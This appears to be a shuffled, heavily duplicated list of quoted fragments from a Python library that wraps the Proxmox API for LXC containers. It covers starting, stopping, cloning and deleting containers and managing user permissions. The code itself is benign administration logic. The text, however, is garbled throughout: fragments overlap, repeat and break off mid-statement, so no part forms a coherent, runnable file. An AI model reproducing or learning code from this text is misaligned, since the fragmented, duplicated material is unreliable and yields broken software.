\"\"\" try: newid", "\"\"\" return self._api.delete_container(node=self._node, vmid=self._vmid) def start(self) -> str: \"\"\" Start container :return: ID", "from .nodes import ProxmoxNode, ProxmoxNodeDict from .users import ProxmoxUser from typing import Dict,", "get_status_report(self) -> Dict[str, Any]: \"\"\" Get detailed status info about this container :return:", "-> str: \"\"\" Shutdown container (safely) :param timeout: Number of seconds to wait", "ID or ProxmoxUser object :param role: String name of the role :return: None", "def __repr__(self): return f\"<{self.__class__.__name__}: {self._vmid}>\" def __str__(self): return self._vmid def __eq__(self, other: 'ProxmoxContainer'):", "ID of deleting task \"\"\" return self._api.delete_container(node=self._node, vmid=self._vmid) def start(self) -> str: \"\"\"", "resume(self) -> str: \"\"\" Resume container WARNING: doesn't appear in Proxmox GUI and", "users with permissions for this container and their roles :return: List of tuples", "if timeout is not None: kwargs[\"timeout\"] = str(timeout) return self._api.reboot_container(**kwargs) def suspend(self) ->", "is currently running :return: True/False \"\"\" config = self.get_status_report() return \"status\" in config.keys()", ":return: ID of cloning task \"\"\" try: newid = int(newid) except ValueError: raise", "self._api.get_container_config(node=self._node, vmid=self._vmid) def running(self) -> bool: \"\"\" Whether container is currently running :return:", ":return: ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid, \"forceStop\": '1'", "Whether this container is a template :return: True/False \"\"\" config = self.get_config() return", "return self._containers.values() def items(self): self._get_containers() return self._containers.items() def remove(self, vmid: Union[str, int]) ->", "Union[str, ProxmoxNode] = None, name: str = None, full: bool = True) ->", "1 def clone(self, newid: Union[str, int], newnode: Union[str, ProxmoxNode] = None, name: str", "in Proxmox GUI and probably never works :return: ID of task \"\"\" kwargs", "user.id self._api.update_access_control_list(path=path, roles=role, users=user + \"@pve\", delete=\"1\", propagate=\"0\") def remove_all_permissions(self) -> None: \"\"\"", "999_999_999: raise ValueError(\"ID of container should be an integer between 100 and 999999999\")", "(optional) :param full: Whether to make storage unlinked (note that linked might not", "JSON-like format \"\"\" return self._api.get_container_config(node=self._node, vmid=self._vmid) def running(self) -> bool: \"\"\" Whether container", "-> str: \"\"\" Reboot container (safely) :param timeout: Number of seconds to wait", "None: if isinstance(newnode, ProxmoxNode): newnode = newnode.id kwargs[\"target\"] = newnode if name is", "def remove(self, vmid: Union[str, int]) -> None: \"\"\" Remove container by ID :param", "self._get_containers() return self._containers[key] def __iter__(self): self._get_containers() return iter(self._containers) def __repr__(self): self._get_containers() return f\"<{self.__class__.__name__}:", "config[\"status\"] == \"running\" def is_template(self) -> bool: \"\"\" Whether this container is a", "newid < 100 or newid > 999_999_999: raise ValueError(\"ID of container should be", "class ProxmoxContainer: def __init__(self, api: APIWrapper, vmid: str, node: str): self._api = api", "\"\"\" return self._api.get_container_status(node=self._node, vmid=self._vmid) def get_config(self) -> Dict[str, Any]: \"\"\" Get detailed config", "(optional, default=True) :return: ID of cloning task \"\"\" try: newid = int(newid) except", "ValueError: raise ValueError(\"ID of container should be an integer between 100 and 999999999\")", "ProxmoxContainerDict: def __init__(self, api: APIWrapper): self._api = api self._containers: Dict[str, ProxmoxContainer] = {}", "container is a template :return: True/False \"\"\" config = self.get_config() return \"template\" in", "if timeout is not None: kwargs[\"timeout\"] = str(timeout) return self._api.shutdown_container(**kwargs) def reboot(self, timeout:", "def running(self) -> bool: \"\"\" Whether container is currently running :return: True/False \"\"\"", "newnode: New node ID or ProxmoxNode object (optional) :param name: Name of new", "task \"\"\" return self._api.delete_container(node=self._node, vmid=self._vmid) def start(self) -> str: \"\"\" Start container :return:", "ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.start_container(**kwargs) def", "+ \"@pve\", delete=\"0\", propagate=\"0\") def remove_permission(self, user: Union[str, ProxmoxUser], role: str) -> None:", "__getitem__(self, key: Union[str, int]) -> ProxmoxContainer: key = str(key) self._get_containers() return self._containers[key] def", "make storage unlinked (note that linked might not be supported) (optional, default=True) :return:", "= str(timeout) return self._api.reboot_container(**kwargs) def suspend(self) -> str: \"\"\" Suspend container WARNING: doesn't", "users with any role :return: None \"\"\" for user, permission in self.view_permissions(): self.remove_permission(user,", "return self._api.clone_container(**kwargs) def delete(self) -> str: \"\"\" Delete this container :return: ID of", "Any]: \"\"\" Get detailed status info about this container :return: Container info in", "__eq__(self, other: 'ProxmoxContainer'): return self._vmid == other._vmid and self._node == other._node class ProxmoxContainerDict:", "self._containers[vmid].delete() def __len__(self): self._get_containers() return len(self._containers) def __getitem__(self, key: Union[str, int]) -> ProxmoxContainer:", "Suspend container WARNING: doesn't appear in Proxmox GUI and probably never works :return:", "or newid > 999_999_999: raise ValueError(\"ID of container should be an integer between", "container is currently running :return: True/False \"\"\" config = self.get_status_report() return \"status\" in", "self._containers.items() def remove(self, vmid: Union[str, int]) -> None: \"\"\" Remove container by ID", "timeout: int = None, force_stop: bool = True) -> str: \"\"\" Shutdown container", "\"\"\" Remove permission for this container :param user: User ID or ProxmoxUser object", "if shutdown failed (optional, default=True) :return: ID of task \"\"\" kwargs = {\"node\":", "name: Name of new LXC (optional) :param full: Whether to make storage unlinked", "def reboot(self, timeout: int = None) -> str: \"\"\" Reboot container (safely) :param", "Whether to make storage unlinked (note that linked might not be supported) (optional,", "\"\"\" :return: Unique ID of container (get-only) \"\"\" return self._vmid @property def node(self)", "timeout is not None: kwargs[\"timeout\"] = str(timeout) return self._api.shutdown_container(**kwargs) def reboot(self, timeout: int", "resp = self._api.get_access_control_list() return [(ProxmoxUser(self._api, el[\"ugid\"].split(\"@\")[0]), el[\"roleid\"]) for el in resp if el[\"path\"]", "return iter(self._containers) def __repr__(self): self._get_containers() return f\"<{self.__class__.__name__}: {repr(self._containers)}>\" def _get_containers(self): containers = []", "object :param role: String name of the role :return: None \"\"\" path =", "to make storage unlinked (note that linked might not be supported) (optional, default=True)", "__len__(self): self._get_containers() return len(self._containers) def __getitem__(self, key: Union[str, int]) -> ProxmoxContainer: key =", "str(key) self._get_containers() return self._containers[key] def __iter__(self): self._get_containers() return iter(self._containers) def __repr__(self): self._get_containers() return", ".nodes import ProxmoxNode, ProxmoxNodeDict from .users import ProxmoxUser from typing import Dict, List,", "@property def node(self) -> ProxmoxNode: \"\"\" :return: Node on which containers is located", "container should be an integer between 100 and 999999999\") if newid < 100", "config.keys() and config[\"template\"] == 1 def clone(self, newid: Union[str, int], newnode: Union[str, ProxmoxNode]", ":return: ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.start_container(**kwargs)", "user = user.id self._api.update_access_control_list(path=path, roles=role, users=user + \"@pve\", delete=\"1\", propagate=\"0\") def remove_all_permissions(self) ->", "self._node, \"vmid\": self._vmid, \"forceStop\": '1' if force_stop else '0'} if timeout is not", "Delete this container :return: ID of deleting task \"\"\" return self._api.delete_container(node=self._node, vmid=self._vmid) def", "ProxmoxUser from typing import Dict, List, Tuple, Any, Union class ProxmoxContainer: def __init__(self,", "of new LXC (optional) :param full: Whether to make storage unlinked (note that", "objects and string names of roles \"\"\" path = \"/vms/\" + self._vmid resp", "new LXC (optional) :param full: Whether to make storage unlinked (note that linked", "in config.keys() and config[\"status\"] == \"running\" def is_template(self) -> bool: \"\"\" Whether this", "remove_all_permissions(self) -> None: \"\"\" Remove all permissions for this container for all users", "roles :return: List of tuples of ProxmoxUser objects and string names of roles", "= newnode if name is not None: kwargs[\"hostname\"] = name return self._api.clone_container(**kwargs) def", "Dict[str, Any]: \"\"\" Get detailed status info about this container :return: Container info", "return self._vmid @property def node(self) -> ProxmoxNode: \"\"\" :return: Node on which containers", "None: kwargs[\"hostname\"] = name return self._api.clone_container(**kwargs) def delete(self) -> str: \"\"\" Delete this", "newnode = newnode.id kwargs[\"target\"] = newnode if name is not None: kwargs[\"hostname\"] =", "self._node, \"vmid\": self._vmid} return self._api.suspend_container(**kwargs) def resume(self) -> str: \"\"\" Resume container WARNING:", ":return: None \"\"\" vmid = str(vmid) self._get_containers() self._containers[vmid].delete() def __len__(self): self._get_containers() return len(self._containers)", "ProxmoxNode: \"\"\" :return: Node on which containers is located (get-only) \"\"\" return ProxmoxNode(self._api,", "self._vmid, \"full\": '1' if full else '0'} if newnode is not None: if", "el[\"path\"] == path] def add_permission(self, user: Union[str, ProxmoxUser], role: str) -> None: \"\"\"", "isinstance(user, ProxmoxUser): user = user.id self._api.update_access_control_list(path=path, roles=role, users=user + \"@pve\", delete=\"0\", propagate=\"0\") def", "(optional) :param name: Name of new LXC (optional) :param full: Whether to make", "any role :return: None \"\"\" for user, permission in self.view_permissions(): self.remove_permission(user, permission) def", "def stop(self) -> str: \"\"\" Stop container (unsafely) :return: ID of task \"\"\"", "of ProxmoxUser objects and string names of roles \"\"\" path = \"/vms/\" +", "JSON-like format \"\"\" return self._api.get_container_status(node=self._node, vmid=self._vmid) def get_config(self) -> Dict[str, Any]: \"\"\" Get", "self._api.get_access_control_list() return [(ProxmoxUser(self._api, el[\"ugid\"].split(\"@\")[0]), el[\"roleid\"]) for el in resp if el[\"path\"] and el[\"type\"]", "self._api.clone_container(**kwargs) def delete(self) -> str: \"\"\" Delete this container :return: ID of deleting", "\"\"\" Start container :return: ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\":", "of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.start_container(**kwargs) def stop(self)", "roles \"\"\" path = \"/vms/\" + self._vmid resp = self._api.get_access_control_list() return [(ProxmoxUser(self._api, el[\"ugid\"].split(\"@\")[0]),", "= name return self._api.clone_container(**kwargs) def delete(self) -> str: \"\"\" Delete this container :return:", "self._node, \"vmid\": self._vmid, \"full\": '1' if full else '0'} if newnode is not", "Get detailed status info about this container :return: Container info in JSON-like format", "def suspend(self) -> str: \"\"\" Suspend container WARNING: doesn't appear in Proxmox GUI", "'0'} if timeout is not None: kwargs[\"timeout\"] = str(timeout) return self._api.shutdown_container(**kwargs) def reboot(self,", "from .users import ProxmoxUser from typing import Dict, List, Tuple, Any, Union class", "def id(self) -> str: \"\"\" :return: Unique ID of container (get-only) \"\"\" return", "True) -> str: \"\"\" Shutdown container (safely) :param timeout: Number of seconds to", "kwargs = {\"node\": self._node, \"vmid\": self._vmid, \"forceStop\": '1' if force_stop else '0'} if", "self._vmid} return self._api.resume_container(**kwargs) def view_permissions(self) -> List[Tuple[ProxmoxUser, str]]: \"\"\" Get a list of", "self._api = api self._containers: Dict[str, ProxmoxContainer] = {} def keys(self): self._get_containers() return self._containers.keys()", "ProxmoxContainer: def __init__(self, api: APIWrapper, vmid: str, node: str): self._api = api self._vmid", "Container config in JSON-like format \"\"\" return self._api.get_container_config(node=self._node, vmid=self._vmid) def running(self) -> bool:", "-> str: \"\"\" Start container :return: ID of task \"\"\" kwargs = {\"node\":", "ProxmoxContainer: key = str(key) self._get_containers() return self._containers[key] def __iter__(self): self._get_containers() return iter(self._containers) def", "def keys(self): self._get_containers() return self._containers.keys() def values(self): self._get_containers() return self._containers.values() def items(self): self._get_containers()", "def get_status_report(self) -> Dict[str, Any]: \"\"\" Get detailed status info about this container", "return \"template\" in config.keys() and config[\"template\"] == 1 def clone(self, newid: Union[str, int],", "names of roles \"\"\" path = \"/vms/\" + self._vmid resp = self._api.get_access_control_list() return", "task \"\"\" try: newid = int(newid) except ValueError: raise ValueError(\"ID of container should", "user = user.id self._api.update_access_control_list(path=path, roles=role, users=user + \"@pve\", delete=\"0\", propagate=\"0\") def remove_permission(self, user:", "node) for cont in resp] self._containers = {cont.id: cont for cont in containers}", "= self.get_config() return \"template\" in config.keys() and config[\"template\"] == 1 def clone(self, newid:", "\"vmid\": self._vmid, \"full\": '1' if full else '0'} if newnode is not None:", "-> str: \"\"\" Suspend container WARNING: doesn't appear in Proxmox GUI and probably", "\"vmid\": self._vmid} return self._api.stop_container(**kwargs) def shutdown(self, timeout: int = None, force_stop: bool =", "def delete(self) -> str: \"\"\" Delete this container :return: ID of deleting task", "return ProxmoxNode(self._api, self._node) def get_status_report(self) -> Dict[str, Any]: \"\"\" Get detailed status info", "between 100 and 999999999\") if newid < 100 or newid > 999_999_999: raise", "on which containers is located (get-only) \"\"\" return ProxmoxNode(self._api, self._node) def get_status_report(self) ->", "vmid self._node = node @property def id(self) -> str: \"\"\" :return: Unique ID", "= int(newid) except ValueError: raise ValueError(\"ID of container should be an integer between", "import Dict, List, Tuple, Any, Union class ProxmoxContainer: def __init__(self, api: APIWrapper, vmid:", "running(self) -> bool: \"\"\" Whether container is currently running :return: True/False \"\"\" config", "return self._containers.items() def remove(self, vmid: Union[str, int]) -> None: \"\"\" Remove container by", ":param force_stop: Whether to stop a container if shutdown failed (optional, default=True) :return:", "self._api.update_access_control_list(path=path, roles=role, users=user + \"@pve\", delete=\"0\", propagate=\"0\") def remove_permission(self, user: Union[str, ProxmoxUser], role:", "self._api.list_containers(node) containers += [ProxmoxContainer(self._api, str(cont[\"vmid\"]), node) for cont in resp] self._containers = {cont.id:", "Clone LXC container :param newid: ID of new LXC (integer number 100-999999999) :param", "of cloning task \"\"\" try: newid = int(newid) except ValueError: raise ValueError(\"ID of", "-> Dict[str, Any]: \"\"\" Get detailed config :return: Container config in JSON-like format", "user: User ID or ProxmoxUser object :param role: String name of the role", "in JSON-like format \"\"\" return self._api.get_container_status(node=self._node, vmid=self._vmid) def get_config(self) -> Dict[str, Any]: \"\"\"", "\"\"\" Shutdown container (safely) :param timeout: Number of seconds to wait (optional) :param", "== \"user\" and el[\"ugid\"].split(\"@\")[1] == \"pve\" and el[\"path\"] == path] def add_permission(self, user:", "all users with any role :return: None \"\"\" for user, permission in self.view_permissions():", "vmid: str, node: str): self._api = api self._vmid = vmid self._node = node", "{\"node\": self._node, \"vmid\": self._vmid} return self._api.resume_container(**kwargs) def view_permissions(self) -> List[Tuple[ProxmoxUser, str]]: \"\"\" Get", "\"\"\" config = self.get_config() return \"template\" in config.keys() and config[\"template\"] == 1 def", "with any role :return: None \"\"\" for user, permission in self.view_permissions(): self.remove_permission(user, permission)", "self._node) def get_status_report(self) -> Dict[str, Any]: \"\"\" Get detailed status info about this", "str(timeout) return self._api.reboot_container(**kwargs) def suspend(self) -> str: \"\"\" Suspend container WARNING: doesn't appear", "(optional) :param force_stop: Whether to stop a container if shutdown failed (optional, default=True)", "role :return: None \"\"\" path = \"/vms/\" + self._vmid if isinstance(user, ProxmoxUser): user", "= {\"node\": self._node, \"vmid\": self._vmid} return self._api.stop_container(**kwargs) def shutdown(self, timeout: int = None,", "ProxmoxUser): user = user.id self._api.update_access_control_list(path=path, roles=role, users=user + \"@pve\", delete=\"1\", propagate=\"0\") def remove_all_permissions(self)", "str: \"\"\" Stop container (unsafely) :return: ID of task \"\"\" kwargs = {\"node\":", "task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.stop_container(**kwargs) def shutdown(self, timeout:", "{\"node\": self._node, \"vmid\": self._vmid} return self._api.start_container(**kwargs) def stop(self) -> str: \"\"\" Stop container", "def view_permissions(self) -> List[Tuple[ProxmoxUser, str]]: \"\"\" Get a list of users with permissions", "ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.suspend_container(**kwargs) def", "\"\"\" vmid = str(vmid) self._get_containers() self._containers[vmid].delete() def __len__(self): self._get_containers() return len(self._containers) def __getitem__(self,", "string names of roles \"\"\" path = \"/vms/\" + self._vmid resp = self._api.get_access_control_list()", "of new LXC (integer number 100-999999999) :param newnode: New node ID or ProxmoxNode", "\"\"\" Whether container is currently running :return: True/False \"\"\" config = self.get_status_report() return", "WARNING: doesn't appear in Proxmox GUI and probably never works :return: ID of", ":param role: String name of the role :return: None \"\"\" path = \"/vms/\"", "Union[str, int]) -> None: \"\"\" Remove container by ID :param vmid: Container ID", "vmid=self._vmid) def start(self) -> str: \"\"\" Start container :return: ID of task \"\"\"", "with permissions for this container and their roles :return: List of tuples of", "kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.resume_container(**kwargs) def view_permissions(self) -> List[Tuple[ProxmoxUser, str]]:", "Union[str, int]) -> ProxmoxContainer: key = str(key) self._get_containers() return self._containers[key] def __iter__(self): self._get_containers()", "\"vmid\": self._vmid, \"forceStop\": '1' if force_stop else '0'} if timeout is not None:", "kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.start_container(**kwargs) def stop(self) -> str: \"\"\"", "ID :return: None \"\"\" vmid = str(vmid) self._get_containers() self._containers[vmid].delete() def __len__(self): self._get_containers() return", "Number of seconds to wait (optional) :return: ID of task \"\"\" kwargs =", "= str(vmid) self._get_containers() self._containers[vmid].delete() def __len__(self): self._get_containers() return len(self._containers) def __getitem__(self, key: Union[str,", ":return: Unique ID of container (get-only) \"\"\" return self._vmid @property def node(self) ->", "return \"status\" in config.keys() and config[\"status\"] == \"running\" def is_template(self) -> bool: \"\"\"", "is_template(self) -> bool: \"\"\" Whether this container is a template :return: True/False \"\"\"", "and 999999999\") newid = str(newid) kwargs = {\"newid\": newid, \"node\": self._node, \"vmid\": self._vmid,", "delete=\"0\", propagate=\"0\") def remove_permission(self, user: Union[str, ProxmoxUser], role: str) -> None: \"\"\" Remove", "an integer between 100 and 999999999\") newid = str(newid) kwargs = {\"newid\": newid,", "list of users with permissions for this container and their roles :return: List", "roles=role, users=user + \"@pve\", delete=\"0\", propagate=\"0\") def remove_permission(self, user: Union[str, ProxmoxUser], role: str)", "located (get-only) \"\"\" return ProxmoxNode(self._api, self._node) def get_status_report(self) -> Dict[str, Any]: \"\"\" Get", "(get-only) \"\"\" return ProxmoxNode(self._api, self._node) def get_status_report(self) -> Dict[str, Any]: \"\"\" Get detailed", "> 999_999_999: raise ValueError(\"ID of container should be an integer between 100 and", "+ self._vmid resp = self._api.get_access_control_list() return [(ProxmoxUser(self._api, el[\"ugid\"].split(\"@\")[0]), el[\"roleid\"]) for el in resp", "path] def add_permission(self, user: Union[str, ProxmoxUser], role: str) -> None: \"\"\" Add new", "Resume container WARNING: doesn't appear in Proxmox GUI and probably never works :return:", "= str(key) self._get_containers() return self._containers[key] def __iter__(self): self._get_containers() return iter(self._containers) def __repr__(self): self._get_containers()", "100 or newid > 999_999_999: raise ValueError(\"ID of container should be an integer", ":return: Container config in JSON-like format \"\"\" return self._api.get_container_config(node=self._node, vmid=self._vmid) def running(self) ->", "status info about this container :return: Container info in JSON-like format \"\"\" return", "user: Union[str, ProxmoxUser], role: str) -> None: \"\"\" Remove permission for this container", "users=user + \"@pve\", delete=\"1\", propagate=\"0\") def remove_all_permissions(self) -> None: \"\"\" Remove all permissions", "if name is not None: kwargs[\"hostname\"] = name return self._api.clone_container(**kwargs) def delete(self) ->", "= str(timeout) return self._api.shutdown_container(**kwargs) def reboot(self, timeout: int = None) -> str: \"\"\"", "-> str: \"\"\" Clone LXC container :param newid: ID of new LXC (integer", "\"\"\" try: newid = int(newid) except ValueError: raise ValueError(\"ID of container should be", "full: bool = True) -> str: \"\"\" Clone LXC container :param newid: ID", "LXC (integer number 100-999999999) :param newnode: New node ID or ProxmoxNode object (optional)", "newid > 999_999_999: raise ValueError(\"ID of container should be an integer between 100", "if full else '0'} if newnode is not None: if isinstance(newnode, ProxmoxNode): newnode", "self._api.get_container_status(node=self._node, vmid=self._vmid) def get_config(self) -> Dict[str, Any]: \"\"\" Get detailed config :return: Container", "Number of seconds to wait (optional) :param force_stop: Whether to stop a container", "raise ValueError(\"ID of container should be an integer between 100 and 999999999\") newid", "self._vmid, \"forceStop\": '1' if force_stop else '0'} if timeout is not None: kwargs[\"timeout\"]", "to wait (optional) :return: ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\":", "wait (optional) :return: ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid}", "(unsafely) :return: ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return", "kwargs = {\"newid\": newid, \"node\": self._node, \"vmid\": self._vmid, \"full\": '1' if full else", "\"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid, \"forceStop\": '1' if force_stop else '0'}", "self._vmid def __eq__(self, other: 'ProxmoxContainer'): return self._vmid == other._vmid and self._node == other._node", "and 999999999\") if newid < 100 or newid > 999_999_999: raise ValueError(\"ID of", "newid, \"node\": self._node, \"vmid\": self._vmid, \"full\": '1' if full else '0'} if newnode", "len(self._containers) def __getitem__(self, key: Union[str, int]) -> ProxmoxContainer: key = str(key) self._get_containers() return", "container by ID :param vmid: Container ID :return: None \"\"\" vmid = str(vmid)", "user, permission in self.view_permissions(): self.remove_permission(user, permission) def __repr__(self): return f\"<{self.__class__.__name__}: {self._vmid}>\" def __str__(self):", "_get_containers(self): containers = [] for node in ProxmoxNodeDict(self._api).keys(): resp = self._api.list_containers(node) containers +=", "newnode.id kwargs[\"target\"] = newnode if name is not None: kwargs[\"hostname\"] = name return", "for this container :param user: User ID or ProxmoxUser object :param role: String", "'0'} if newnode is not None: if isinstance(newnode, ProxmoxNode): newnode = newnode.id kwargs[\"target\"]", "if newnode is not None: if isinstance(newnode, ProxmoxNode): newnode = newnode.id kwargs[\"target\"] =", "of container should be an integer between 100 and 999999999\") if newid <", "of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.resume_container(**kwargs) def view_permissions(self)", "role :return: None \"\"\" for user, permission in self.view_permissions(): self.remove_permission(user, permission) def __repr__(self):", "return self._api.shutdown_container(**kwargs) def reboot(self, timeout: int = None) -> str: \"\"\" Reboot container", "or ProxmoxNode object (optional) :param name: Name of new LXC (optional) :param full:", "integer between 100 and 999999999\") newid = str(newid) kwargs = {\"newid\": newid, \"node\":", "task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid, \"forceStop\": '1' if force_stop else", "return [(ProxmoxUser(self._api, el[\"ugid\"].split(\"@\")[0]), el[\"roleid\"]) for el in resp if el[\"path\"] and el[\"type\"] ==", "values(self): self._get_containers() return self._containers.values() def items(self): self._get_containers() return self._containers.items() def remove(self, vmid: Union[str,", "self._node = node @property def id(self) -> str: \"\"\" :return: Unique ID of", "== other._node class ProxmoxContainerDict: def __init__(self, api: APIWrapper): self._api = api self._containers: Dict[str,", "= str(newid) kwargs = {\"newid\": newid, \"node\": self._node, \"vmid\": self._vmid, \"full\": '1' if", "isinstance(user, ProxmoxUser): user = user.id self._api.update_access_control_list(path=path, roles=role, users=user + \"@pve\", delete=\"1\", propagate=\"0\") def", "self._get_containers() self._containers[vmid].delete() def __len__(self): self._get_containers() return len(self._containers) def __getitem__(self, key: Union[str, int]) ->", "def node(self) -> ProxmoxNode: \"\"\" :return: Node on which containers is located (get-only)", "if force_stop else '0'} if timeout is not None: kwargs[\"timeout\"] = str(timeout) return", ":return: ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.suspend_container(**kwargs)", "\"running\" def is_template(self) -> bool: \"\"\" Whether this container is a template :return:", "ProxmoxNode object (optional) :param name: Name of new LXC (optional) :param full: Whether", "ValueError(\"ID of container should be an integer between 100 and 999999999\") if newid", "self._node, \"vmid\": self._vmid} return self._api.start_container(**kwargs) def stop(self) -> str: \"\"\" Stop container (unsafely)", "default=True) :return: ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid, \"forceStop\":", "self._api.resume_container(**kwargs) def view_permissions(self) -> List[Tuple[ProxmoxUser, str]]: \"\"\" Get a list of users with", ":return: List of tuples of ProxmoxUser objects and string names of roles \"\"\"", "def get_config(self) -> Dict[str, Any]: \"\"\" Get detailed config :return: Container config in", "\"@pve\", delete=\"0\", propagate=\"0\") def remove_permission(self, user: Union[str, ProxmoxUser], role: str) -> None: \"\"\"", "= {} def keys(self): self._get_containers() return self._containers.keys() def values(self): self._get_containers() return self._containers.values() def", "def add_permission(self, user: Union[str, ProxmoxUser], role: str) -> None: \"\"\" Add new permission", "new LXC (integer number 100-999999999) :param newnode: New node ID or ProxmoxNode object", "of container should be an integer between 100 and 999999999\") newid = str(newid)", "keys(self): self._get_containers() return self._containers.keys() def values(self): self._get_containers() return self._containers.values() def items(self): self._get_containers() return", "delete=\"1\", propagate=\"0\") def remove_all_permissions(self) -> None: \"\"\" Remove all permissions for this container", "not None: kwargs[\"timeout\"] = str(timeout) return self._api.shutdown_container(**kwargs) def reboot(self, timeout: int = None)", "timeout: Number of seconds to wait (optional) :param force_stop: Whether to stop a", "\"\"\" return self._vmid @property def node(self) -> ProxmoxNode: \"\"\" :return: Node on which", "return self._vmid def __eq__(self, other: 'ProxmoxContainer'): return self._vmid == other._vmid and self._node ==", "< 100 or newid > 999_999_999: raise ValueError(\"ID of container should be an", "True) -> str: \"\"\" Clone LXC container :param newid: ID of new LXC", "delete(self) -> str: \"\"\" Delete this container :return: ID of deleting task \"\"\"", "be supported) (optional, default=True) :return: ID of cloning task \"\"\" try: newid =", "in JSON-like format \"\"\" return self._api.get_container_config(node=self._node, vmid=self._vmid) def running(self) -> bool: \"\"\" Whether", "not None: kwargs[\"timeout\"] = str(timeout) return self._api.reboot_container(**kwargs) def suspend(self) -> str: \"\"\" Suspend", "config.keys() and config[\"status\"] == \"running\" def is_template(self) -> bool: \"\"\" Whether this container", "self._get_containers() return len(self._containers) def __getitem__(self, key: Union[str, int]) -> ProxmoxContainer: key = str(key)", "Shutdown container (safely) :param timeout: Number of seconds to wait (optional) :param force_stop:", "(get-only) \"\"\" return self._vmid @property def node(self) -> ProxmoxNode: \"\"\" :return: Node on", "return self._api.get_container_config(node=self._node, vmid=self._vmid) def running(self) -> bool: \"\"\" Whether container is currently running", "name: str = None, full: bool = True) -> str: \"\"\" Clone LXC", "deleting task \"\"\" return self._api.delete_container(node=self._node, vmid=self._vmid) def start(self) -> str: \"\"\" Start container", "number 100-999999999) :param newnode: New node ID or ProxmoxNode object (optional) :param name:", "None: \"\"\" Add new permission for this container :param user: User ID or", "\"vmid\": self._vmid} return self._api.resume_container(**kwargs) def view_permissions(self) -> List[Tuple[ProxmoxUser, str]]: \"\"\" Get a list", "else '0'} if newnode is not None: if isinstance(newnode, ProxmoxNode): newnode = newnode.id", "clone(self, newid: Union[str, int], newnode: Union[str, ProxmoxNode] = None, name: str = None,", "info in JSON-like format \"\"\" return self._api.get_container_status(node=self._node, vmid=self._vmid) def get_config(self) -> Dict[str, Any]:", "(note that linked might not be supported) (optional, default=True) :return: ID of cloning", "of tuples of ProxmoxUser objects and string names of roles \"\"\" path =", "str: \"\"\" Delete this container :return: ID of deleting task \"\"\" return self._api.delete_container(node=self._node,", "= True) -> str: \"\"\" Shutdown container (safely) :param timeout: Number of seconds", "kwargs[\"timeout\"] = str(timeout) return self._api.reboot_container(**kwargs) def suspend(self) -> str: \"\"\" Suspend container WARNING:", "def __repr__(self): self._get_containers() return f\"<{self.__class__.__name__}: {repr(self._containers)}>\" def _get_containers(self): containers = [] for node", "ID of cloning task \"\"\" try: newid = int(newid) except ValueError: raise ValueError(\"ID", "{\"newid\": newid, \"node\": self._node, \"vmid\": self._vmid, \"full\": '1' if full else '0'} if", "__repr__(self): self._get_containers() return f\"<{self.__class__.__name__}: {repr(self._containers)}>\" def _get_containers(self): containers = [] for node in", "\"\"\" Stop container (unsafely) :return: ID of task \"\"\" kwargs = {\"node\": self._node,", "to stop a container if shutdown failed (optional, default=True) :return: ID of task", "integer between 100 and 999999999\") if newid < 100 or newid > 999_999_999:", "Any]: \"\"\" Get detailed config :return: Container config in JSON-like format \"\"\" return", "get_config(self) -> Dict[str, Any]: \"\"\" Get detailed config :return: Container config in JSON-like", "ProxmoxUser): user = user.id self._api.update_access_control_list(path=path, roles=role, users=user + \"@pve\", delete=\"0\", propagate=\"0\") def remove_permission(self,", "== path] def add_permission(self, user: Union[str, ProxmoxUser], role: str) -> None: \"\"\" Add", "-> ProxmoxContainer: key = str(key) self._get_containers() return self._containers[key] def __iter__(self): self._get_containers() return iter(self._containers)", "api: APIWrapper, vmid: str, node: str): self._api = api self._vmid = vmid self._node", "str: \"\"\" Shutdown container (safely) :param timeout: Number of seconds to wait (optional)", "force_stop: Whether to stop a container if shutdown failed (optional, default=True) :return: ID", "stop a container if shutdown failed (optional, default=True) :return: ID of task \"\"\"", "for this container and their roles :return: List of tuples of ProxmoxUser objects", "int]) -> ProxmoxContainer: key = str(key) self._get_containers() return self._containers[key] def __iter__(self): self._get_containers() return", "-> None: \"\"\" Remove permission for this container :param user: User ID or", "self._containers: Dict[str, ProxmoxContainer] = {} def keys(self): self._get_containers() return self._containers.keys() def values(self): self._get_containers()", "and el[\"path\"] == path] def add_permission(self, user: Union[str, ProxmoxUser], role: str) -> None:", "of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid, \"forceStop\": '1' if force_stop", "container :param user: User ID or ProxmoxUser object :param role: String name of", "storage unlinked (note that linked might not be supported) (optional, default=True) :return: ID", "Remove permission for this container :param user: User ID or ProxmoxUser object :param", "def is_template(self) -> bool: \"\"\" Whether this container is a template :return: True/False", "-> None: \"\"\" Add new permission for this container :param user: User ID", "\"\"\" Remove container by ID :param vmid: Container ID :return: None \"\"\" vmid", "vmid=self._vmid) def running(self) -> bool: \"\"\" Whether container is currently running :return: True/False", "return f\"<{self.__class__.__name__}: {repr(self._containers)}>\" def _get_containers(self): containers = [] for node in ProxmoxNodeDict(self._api).keys(): resp", "-> str: \"\"\" Resume container WARNING: doesn't appear in Proxmox GUI and probably", "if newid < 100 or newid > 999_999_999: raise ValueError(\"ID of container should", "is located (get-only) \"\"\" return ProxmoxNode(self._api, self._node) def get_status_report(self) -> Dict[str, Any]: \"\"\"", "this container :param user: User ID or ProxmoxUser object :param role: String name", "\"forceStop\": '1' if force_stop else '0'} if timeout is not None: kwargs[\"timeout\"] =", "= self._api.get_access_control_list() return [(ProxmoxUser(self._api, el[\"ugid\"].split(\"@\")[0]), el[\"roleid\"]) for el in 